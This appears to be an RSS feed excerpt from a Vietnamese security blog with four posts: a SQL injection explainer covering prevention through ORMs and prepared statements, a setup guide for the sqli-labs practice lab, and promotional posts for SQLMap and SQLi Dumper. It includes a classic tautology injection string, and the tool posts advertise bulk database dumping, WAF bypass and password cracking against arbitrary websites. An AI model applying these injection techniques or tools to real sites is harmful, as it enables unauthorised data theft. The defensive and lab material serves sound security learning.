					<description><![CDATA[SQL injection vulnerabilities arise when you make unsafe database queries. Simply put, users can view your website&#8217;s database by entering a query into the URL or filling in the form. Don&#8217;t take SQL injection lightly because it&#8217;s in Top 10 web security vulnerabilities according to OWASP 2020 announcement there. Join the channel Telegram of the [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div id="ftwp-postcontent">
<p><strong>SQL injection vulnerabilities arise when you make unsafe database queries.  Simply put, users can view your website&#8217;s database by entering a query into the URL or filling in the form.  Don&#8217;t take SQL injection lightly because it&#8217;s in <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Ftop-10-lo-hong-bao-mat-web-theo-cong-bo-owasp-2020%2F" rel="noopener" class="local-link">Top 10 web security vulnerabilities according to OWASP 2020 announcement</a> there.</strong></p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2021%2F05%2Fsql-injection.jpg" rel="noopener" class="local-link"><img post-id="6115" fifu-featured="1" decoding="async" class="aligncenter size-full wp-image-26982" src="https://anonyviet.com/wp-content/uploads/2021/05/sql-injection.jpg" alt="What is SQL Injection?  How to Prevent SQL Injection Vulnerabilities" title="What is SQL Injection?  How to Prevent SQL Injection Vulnerabilities" width="838" height="439" srcset="https://anonyviet.com/wp-content/uploads/2021/05/sql-injection.jpg 838w, https://anonyviet.com/wp-content/uploads/2021/05/sql-injection-300x157.jpg 300w, https://anonyviet.com/wp-content/uploads/2021/05/sql-injection-768x402.jpg 768w, https://anonyviet.com/wp-content/uploads/2021/05/sql-injection-750x393.jpg 750w" sizes="(max-width: 838px) 100vw, 838px" title="What is SQL Injection?  How to Prevent SQL Injection Vulnerability 6"/></a></p>
<h2 id="ftoc-cach-khai-thac-lo-hong-sql-injection" class="ftwp-heading">How to exploit SQL Injection vulnerability</h2>
<p>The simplest is to use the SQLi auto exploit tool.  I usually use <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2F%3Fs%3Dsqlmap" rel="noopener" class="local-link">SQLmap</a>, because according to experience this is the tool with the best possible exploitation.  But the downside is that you have to use commands instead of interfaces.</p>
<p>Or you can use the tool <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2F%3Fs%3DSQL%2BDumper" rel="noopener" class="local-link">SQL Dumper</a> has an interface with more features that are easier to set up.  If you are new to learning, you can try this tool to exploit the Website&#8217;s database.</p>
<h2 id="ftoc-lam-the-nao-de-ngan-chan-lo-hong-sql-injection" class="ftwp-heading">How to prevent SQL injection vulnerabilities?</h2>
<p>The best way to prevent SQL injection vulnerabilities is to use a framework that allows you to securely filter input data before it enters the database.  ORM (Object Relational Mapper) is a good option that you should try.  For additional layers of security, validate all input and use WAF (Web Application Firewall).</p>
<h3 id="ftoc-vi-du-don-gian" class="ftwp-heading">Simple example</h3>
<p>Let&#8217;s say I have a Java application that allows users to retrieve their documents by ID.  I can do it like this:</p>
<pre><code>String query = "SELECT * FROM documents WHERE ownerId=" + authContext.getUserId() + " AND documentName="" + request.getParameter("docName") + """;&#13;
executeQuery(query);</code></pre>
<p>If the user ID is 25 and the URL is https://www.example.com/documents/?docName=ABC123, the query would be:</p>
<pre><code>SELECT * FROM documents WHERE ownerId=25 AND documentName="ABC123";</code></pre>
<p>Still fine, right?  But what if the URL is https://www.example.com/documents/?docName=ABC123&#8217;OR&#8217;1&#8217;=&#8217;1?</p>
<p>Now I will get the following query that returns all documents of all users (because 1 = 1 is always true):</p>
<pre><code>SELECT * FROM documents WHERE ownerId=25 AND documentName="ABC123" OR '1'='1';</code></pre>
<p>So how to avoid this error?</p>
<h2 id="ftoc-su-dung-object-relational-mapping" class="ftwp-heading">Using Object Relational Mapping</h2>
<p>Taking Java as an example, using an ORM such as hibernate to implement JPA (Java Persistence API) might look like this.</p>
<p>First, define the model.</p>
<pre><code>@Entity&#13;
public <span class="hljs-class">class Document </span>{&#13;
  @Id&#13;
  @GeneratedValue(strategy=GenerationType.AUTO)&#13;
  private Long id;&#13;
  private String documentName;&#13;
  private Integer ownerId;&#13;
}</code></pre>
<p>Then define the class repository.</p>
<pre><code>@Repository&#13;
public <span class="hljs-class">interface DocumentRepository extends JpaRepository&lt;Document, Long&gt; </span>{&#13;
  <span class="hljs-function">List&lt;Document&gt; findByDocumentNameAndOwnerId(String documentName, Integer ownerId)</span>;&#13;
}</code></pre>
<p>Finally, you can use the repository and fetch the documents as follows:</p>
<pre><code>List&lt;Document&gt; docs = documentRepository.findByDocumentNameAndOwnerId(request.getParameter("docName"), authContext.getUserId());</code></pre>
<p>The ORM will handle all parameters safely.  Now suppose you want more control over the queries.  In that case, many ORMs provide query builder you can use, such as the Hibernate Criteria API.</p>
<p>If you use Python, Django has an equally great ORM;  If you don&#8217;t use Django, sqlalchemy is a great option.</p>
<p>PHP has Doctrine.  You just need to google to search for ORMs that match the technology of your choice.</p>
<h3 id="ftoc-canh-bao" class="ftwp-heading">Warning</h3>
<div class="TnITTtw-original-wrap TnITTtw-padded-single-translation TnITTtw-t">
<p>ORM frameworks are not 100% perfect.</p>
<p>The first is that they still have the functionality to support raw SQL queries/query parts.  You just need to avoid using those features.</p>
<p>The second is that ORM frameworks often have security holes, just like any other software package.  So learn other good practices: validate all input data, use WAF, update packages…</p>
</div>
<div class="TnITTtw-padded-single-translation TnITTtw-trans-wrap TnITTtw-t">
<h2 id="ftoc-prepared-statements" class="ftwp-heading">Prepared statements</h2>
<p>Prepared statements are a more manual choice and should be avoided because compared to ORMs, it has a significantly higher risk of human error.  However, this still beats the simple string concatenation method (like the example above).  This approach looks like this:</p>
<div>
<pre><code>String query = "SELECT * FROM documents WHERE ownerId=? AND documentName = ?";&#13;
PreparedStatement ps = conn.prepareStatement(query);&#13;
ps.setString(1, authContext.getUserId());&#13;
ps.setString(2, request.getParameter("docName"));&#13;
ResultSet rs = ps.executeQuery();</code></pre>
<p>In theory, this is pretty safe.  However, in my experience, as the codebase grows larger, mistakes will start to appear.  You only need one mistake to be completely attacked.  Cases like arrays (documentId IN (“foo”, “bar”)) are where devs often make mistakes.</p>
<p>So if you decide to use this approach, be careful with it when you extend the codebase.</p>
<h2 id="ftoc-web-application-firewall" class="ftwp-heading">Web Application Firewall</h2>
<p>WAF products should not be considered a good SQL injection control.  But they are a great extra layer of security and are often quite effective against SQL injection attacks.</p>
<p>A great open source solution is to deploy Apache with ModSecurity CRS in front of your webapp.</p>
<h2 id="ftoc-database-firewall" class="ftwp-heading">Database Firewall</h2>
<p>Depending on your database and budget, you might consider trying out database firewalls.  I have never tried this, but you can also find out the link below, maybe it will help you.</p>
<h2 id="ftoc-ket-luan" class="ftwp-heading">Conclusion</h2>
<p>SQL injection is a simple injection vulnerability.  And like all security holes, you can prevent it by using an appropriate library or framework for building the protocol, in this case SQL.</p>
</div>
<p>ORM is safer than prepared statements.  And if you don&#8217;t need too much control over the queries, use a lower level ORM commonly known as a query builder.  WAF can add an extra layer of security, but you should never rely on it for security.</p>
</div>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;26928&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;101&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (101 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (101 votes)    </p>
</p></div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/what-is-sql-injection-how-to-prevent-sql-injection-vulnerabilities/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2021/05/sql-injection.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>Practice exploiting SQL injection errors with Sqli-labs</title>
		<link>https://en.anonyviet.com/practice-exploiting-sql-injection-errors-with-sqli-labs/</link>
					<comments>https://en.anonyviet.com/practice-exploiting-sql-injection-errors-with-sqli-labs/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Sun, 29 Jan 2023 06:20:24 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[errors]]></category>
		<category><![CDATA[exploiting]]></category>
		<category><![CDATA[Injection]]></category>
		<category><![CDATA[practice]]></category>
		<category><![CDATA[SQL]]></category>
		<category><![CDATA[Sqlilabs]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=6027</guid>

					<description><![CDATA[SQL injection is a method that allows hackers to take advantage of the vulnerability of the Website&#8217;s input data checking and the error messages returned by the database management system to inject and execute commands. Illegal SQL. SQL injection helps hackers to execute commands like select, insert, update, delete etc right on the web browser, [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div>
<p style="text-align: justify;"><strong>SQL injection is a method that allows hackers to take advantage of the vulnerability of the Website&#8217;s input data checking and the error messages returned by the database management system to inject and execute commands. Illegal SQL.  SQL injection helps hackers to execute commands like select, insert, update, delete etc right on the web browser, even the server the application is running on.</strong></p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p style="text-align: justify;">Although, it has been many years since the first SQLi vulnerability was discovered. SQLi is still a very common vulnerability in web applications.  Almost all credit card (CC) thefts are exploited from this vulnerability.  Previously, online stores were mostly exploited SQL injection to steal information of shoppers.  Now it&#8217;s much better.</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2018%2F08%2F11-08-2018-04-35-54.png" rel="noopener" class="local-link"><img post-id="6027" fifu-featured="1" decoding="async" class="aligncenter size-full wp-image-10744" src="https://anonyviet.com/wp-content/uploads/2018/08/11-08-2018-04-35-54.png" alt="Practice exploiting SQL injection errors with Sqli-labs" title="Practice exploiting SQL injection errors with Sqli-labs" width="740" height="391" srcset="https://anonyviet.com/wp-content/uploads/2018/08/11-08-2018-04-35-54.png 740w, https://anonyviet.com/wp-content/uploads/2018/08/11-08-2018-04-35-54-300x159.png 300w" sizes="(max-width: 740px) 100vw, 740px" title="Practice exploiting SQL injection errors with Sqli-labs 8"/></a></p>
<p style="text-align: justify;">Aim to hone SQLi vulnerability detection skills.  Member DDos (of the WhiteHat forum) introduces the sqli-labs project to you.  This project includes 65 different labs with increasing difficulty.  The contents of sqli-labs include almost all possible paths to SQLi errors such as: GET/POST request, User-Agent&#8230;</p>
<h2 style="text-align: justify;">Practice exploiting SQL injection errors with Sqli-labs</h2>
<p>To install sqli-lab, you need:</p>
<p>You can install software <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fwww.apachefriends.org%2Fdownload.html" rel="nofollow noopener external" class="ext-link" onclick="this.target='_blank';">Xamp (version 5.6) </a>or <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fwww.ampps.com%2Fdownload" rel="nofollow noopener external" class="ext-link" onclick="this.target='_blank';">Amp </a>to simulate PHP, MySQL environment on Windows.  Or practice right on a Linux virtual machine (Centos, Ubuntu, Kali Linux).</p>
<p><strong><span style="color: #0000ff;">I will guide you to practice on Windows with Xampp emulator software.</span></strong></p>
<p><strong><span style="font-size: 14pt;">Step 1</span>:</strong> Load <strong><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fwww.apachefriends.org%2Fdownload.html" rel="nofollow noopener external" class="ext-link" onclick="this.target='_blank';">Xamp (using version 5.6)</a></strong>and proceed with the installation as usual.</p>
<p>Delete all files in the directory: <strong>C:\xampp\htdocs</strong></p>
<p><span style="font-size: 14pt;"><strong>Step 2:</strong> </span>Open Xampp Control Panel</p>
<p>Press the button<strong> Start</strong> Apache, MySQL.  (If Start doesn&#8217;t work, see how to fix the error at <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhoangluyen.com%2Fhai-cach-sua-loi-apache-khong-start-duoc-trong-xampp%2F" rel="nofollow noopener external" class="ext-link" onclick="this.target='_blank';">this lesson)</a></p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2018%2F08%2F11-08-2018-03-42-24.png" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter wp-image-10739 size-full" src="https://anonyviet.com/wp-content/uploads/2018/08/11-08-2018-03-42-24.png" alt="Sqli-labs" width="553" height="363" srcset="https://anonyviet.com/wp-content/uploads/2018/08/11-08-2018-03-42-24.png 553w, https://anonyviet.com/wp-content/uploads/2018/08/11-08-2018-03-42-24-300x197.png 300w" sizes="auto, (max-width: 553px) 100vw, 553px" title="Practice exploiting SQL injection errors with Sqli-labs 9"/></a></p>
<p><span style="font-size: 14pt;"><strong>Step 3:</strong></span>  You download the Sqli-labs installation package at the link below</p>
<p><span style="font-size: 14pt;"><strong>Step 4</strong>:</span> Extract the downloaded file, and copy it to the folder <strong>C:\xampp\htdocs</strong></p>
<p><span style="font-size: 14pt;"><strong>Step 5: </strong></span>Access the link <strong>http://localhost</strong> on the Web browser.</p>
<p>Click on <span style="color: #e4287c;">Setup/reset Database for labs </span>to start installing data for Sqli-labs</p>
<p>If you see the image below, the installation is successful.<a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2018%2F08%2F11-08-2018-04-22-19.png" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter wp-image-10741 size-full" src="https://anonyviet.com/wp-content/uploads/2018/08/11-08-2018-04-22-19.png" alt="Sqli-labs" width="738" height="462" srcset="https://anonyviet.com/wp-content/uploads/2018/08/11-08-2018-04-22-19.png 738w, https://anonyviet.com/wp-content/uploads/2018/08/11-08-2018-04-22-19-300x188.png 300w" sizes="auto, (max-width: 738px) 100vw, 738px" title="Practice exploiting SQL injection errors with Sqli-labs 10"/></a></p>
<p><strong>Step 6:</strong> Go back to localhost home page and click on <span style="color: #ff0040; font-size: 14pt;">SQLi-LABS Page-1<i>(Basic Challenges)</i></span>  to start learning from lesson 1.</p>
<p>If you find it difficult to practice SQLi-Labs exercises, check out the channels <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3Ddu-jkS6-sbo%26amp%3Blist%3DPLkiAz1NPnw8qEgzS7cgVMKavvOAdogsro" rel="nofollow noopener external" class="ext-link" onclick="this.target='_blank';">Tutorials on Youtube</a>.</p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;10738&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
<p><!-- AI CONTENT END 2 --></p></div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/practice-exploiting-sql-injection-errors-with-sqli-labs/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2018/08/11-08-2018-04-35-54.png" medium="image"></media:content>
            	</item>
		<item>
		<title>SQLMap v1.2.9 &#8211; The Most Powerful SQL Injection Vulnerability Exploit</title>
		<link>https://en.anonyviet.com/sqlmap-v1-2-9-the-most-powerful-sql-injection-vulnerability-exploit/</link>
					<comments>https://en.anonyviet.com/sqlmap-v1-2-9-the-most-powerful-sql-injection-vulnerability-exploit/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Sun, 29 Jan 2023 04:33:35 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[Injection]]></category>
		<category><![CDATA[powerful]]></category>
		<category><![CDATA[SQL]]></category>
		<category><![CDATA[SQLMap]]></category>
		<category><![CDATA[v1.2.9]]></category>
		<category><![CDATA[vulnerability]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=5991</guid>

					<description><![CDATA[Today we talk about Hacking with an old but new tool. SQL Injection vulnerabilities have been around for a long time and are quite familiar to us. However, this error is old but still dangerous for any website to make. Join the channel Telegram of the AnonyViet 👉 Link 👈 The reason is compared to [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div id="ftwp-postcontent">
<p style="text-align: justify;"><strong>Today we talk about Hacking with an old but new tool.  SQL Injection vulnerabilities have been around for a long time and are quite familiar to us.  However, this error is old but still dangerous for any website to make.</strong></p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p>The reason is compared to the lack of care in the process of writing data processing code for the website.  This vulnerability is often used by Kiddie Scripts to wreak havoc.  By the way, if you don&#8217;t know who Script Kidde is referring to?  then please read <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fscript-kiddie-nhung-ke-tu-xung-hacker%2F" rel="noopener" class="local-link">here</a>.</p>
<p>This bug allows an intruder to request the server to return data without logging in.  So what do you think if information about the admin account is requested to be sent to Hacker?  Is the whole website going to go to hell with this Hacker game?</p>
<h2 id="ftoc-tan-dung-sqlmap-de-tim-lo-hong-sql-injection" class="ftwp-heading">Leverage SQLMap to Find SQL Injection Vulnerabilities</h2>
<p>You don&#8217;t have to work hard to learn each command line like before and it doesn&#8217;t take too much time.  If you are a <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fscript-kiddie-nhung-ke-tu-xung-hacker%2F" rel="noopener" class="local-link">Script Kidde</a> ?  You will surely love it <strong>SQLMap </strong>and what it can do for you.  First of all, I would like to briefly explain about SQLMap for those who do not know.</p>
<h3 id="ftoc-sqlmap-la-gi" class="ftwp-heading">What is SQLMap?</h3>
<p>This is a tool to help you exploit SQL-related vulnerabilities quickly.  This tool is considered the most powerful weapon in terms of exploiting this SQL vulnerability.  When learning Hacking, you definitely have to use it more or less.</p>
<p>It has many features suitable for SQL penetration testers and a series of automatic branching tools to get the database footprint to fetch data from the database.  Support for accessing the underlying file system and executing commands on the operating system over an out-of-band connection.</p>
<p>That is, when you get in, you will be able to manipulate their data through the network connection.</p>
<p><img post-id="5991" fifu-featured="1" decoding="async" class="aligncenter wp-image-11161 size-full" src="https://anonyviet.com/wp-content/uploads/2018/09/sqlMap.png" alt="SQLMap v1.2.9 &#8211; The Most Powerful SQL Injection Vulnerability Exploit" title="SQLMap v1.2.9 &#8211; The Most Powerful SQL Injection Vulnerability Exploit" width="640" height="483" srcset="https://anonyviet.com/wp-content/uploads/2018/09/sqlMap.png 640w, https://anonyviet.com/wp-content/uploads/2018/09/sqlMap-300x226.png 300w" sizes="(max-width: 640px) 100vw, 640px" title="SQLMap v1.2.9 - The 6 Most Powerful SQL Injection Vulnerability Exploit"/></p>
<p>Operating system <strong>Kali Linux</strong> or <strong>Back Track 5</strong> SQLMap already has built-in.  But for Windows, you have to install Python and SQLMAP to use it.  Because SQLMap is written in Python and requires a Python library in your computer to run.</p>
<h3 id="ftoc-cai-dat-python" class="ftwp-heading">Install Python</h3>
<p>As mentioned above, to use SQLMap, you must have a Python library on your computer.  You can download and install the Python library at the homepage <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fwww.python.org%2F" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">https://www.python.org/</a> (It is recommended to install version from 2.7 or higher).</p>
<h2 id="ftoc-sqlmap-v1-2-9-co-gi-moi" class="ftwp-heading">What&#8217;s new in SQLMap v1.2.9?</h2>
<p>This is a weapon that has existed for a long time through many versions.  But now, it has just been updated to version 1.2.9 with many new features.  Specifically, information about the new features in this update is:</p>
<ul>
<li>Full support for database management systems <strong>MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB</strong> and<strong> Informix.</strong></li>
<li>Full support for six SQL Injection techniques: <strong>boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band</strong>.</li>
<li>Allows direct connection to the database without passing through SQL injection.  You just need to enter the DBMS login information, IP address, Port and Database name you want to connect.  (This is what I like.)</li>
<li>Supports enumeration of users, password hashes, privileges, roles, databases, tables and columns.</li>
<li>Helps you to crack the hash of user passwords.  That means you can reverse-decrypt and get the password of any user you want.</li>
<li>Allow to copy (backup) the database as you like.</li>
<li>Provides full control over the database upon successful intrusion.</li>
<li>Allows you to Download and Upload Files comfortably to the Database very quickly.</li>
</ul>
<p>There are a few more special features that I have not listed.  Experience it yourself and enjoy with this new version.  Now I will guide you to install SQLMap (remember to install Python first).</p>
<h2 id="ftoc-cai-dat-sqlmap" class="ftwp-heading">Install SQLMap</h2>
<p>You can download the compressed file directly at one of the two links below.</p>
<p>Alternatively, you can use the command <strong>Git </strong>to Clone the original from the manufacturer.</p>
<pre class="theme:cg-cookie lang:default decode:true ">git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev</pre>
<h2 id="ftoc-cach-su-dung" class="ftwp-heading">Using</h2>
<p>Use the command below to display the basic commands in <strong>SQLMap v1.2.9</strong></p>
<pre class="theme:cg-cookie lang:default decode:true ">python sqlmap.py -h</pre>
<p>From the commands listed, you can Google more about their meaning if you want to understand more deeply.  Because its statements are many with different functions.  I cannot say it all in one post.</p>
<p style="text-align: right;">Good luck<br />Lmint</p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;11159&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/sqlmap-v1-2-9-the-most-powerful-sql-injection-vulnerability-exploit/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2018/09/sqlMap.png" medium="image"></media:content>
            	</item>
		<item>
		<title>Download SQLi Dumper v10.1 Full &#8211; SQL Injection Error Exploit Tool</title>
		<link>https://en.anonyviet.com/download-sqli-dumper-v10-1-full-sql-injection-error-exploit-tool/</link>
					<comments>https://en.anonyviet.com/download-sqli-dumper-v10-1-full-sql-injection-error-exploit-tool/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Sat, 28 Jan 2023 04:30:10 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Download]]></category>
		<category><![CDATA[Dumper]]></category>
		<category><![CDATA[error]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[Full]]></category>
		<category><![CDATA[Injection]]></category>
		<category><![CDATA[SQL]]></category>
		<category><![CDATA[SQLi]]></category>
		<category><![CDATA[tool]]></category>
		<category><![CDATA[v10.1]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=5400</guid>

					<description><![CDATA[SQLi Dumper is a specialized software to exploit SQL errors. You can use it to exploit a variety of different websites Join the channel Telegram of the AnonyViet 👉 Link 👈 Main function: Multi-threading support. Online search engine (to find features); Automatic extraction and analysis from URL lists; Automatically search data in bulk URL lists; [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div id="ftwp-postcontent">
<p><strong>SQLi Dumper</strong> is a specialized software to exploit SQL errors.  You can use it to exploit a variety of different websites</p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p><strong>Main function:</strong></p>
<ul>
<li>Multi-threading support.  Online search engine (to find features);</li>
<li>Automatic extraction and analysis from URL lists;</li>
<li>Automatically search data in bulk URL lists;</li>
<li>Automated parser for injection points by URL, POST, Cookies, UserLogin or UserPassword;</li>
<li>Dumper supports data dump with multithreading (database/table/column/fetch);</li>
<li>Mining supports up to 100 threads;</li>
<li>Analyzer and Dumper support streams up to 50;</li>
<li>Advanced WAF bypass method;</li>
<li>Advanced custom query box;</li>
<li>Dumper can dump large amounts of data, with the ability to control the latency of each request (multithreading);</li>
<li>Vulnerability to vulnerability is easy;</li>
<li>Support proxy list;</li>
<li>GeoIP database;</li>
<li>Internal database;</li>
<li>Trash bin system;</li>
<li>Administrator login finder;</li>
<li>Hasher cracker online;</li>
<li>Reverse IP;</li>
<li>.Exe standalone (no installation).</li>
</ul>
<h2 id="ftoc-tai-phan-mem" class="ftwp-heading"><strong><span style="color: #800080;"><span style="font-size: 14pt;">Download software</span></span></strong></h2>
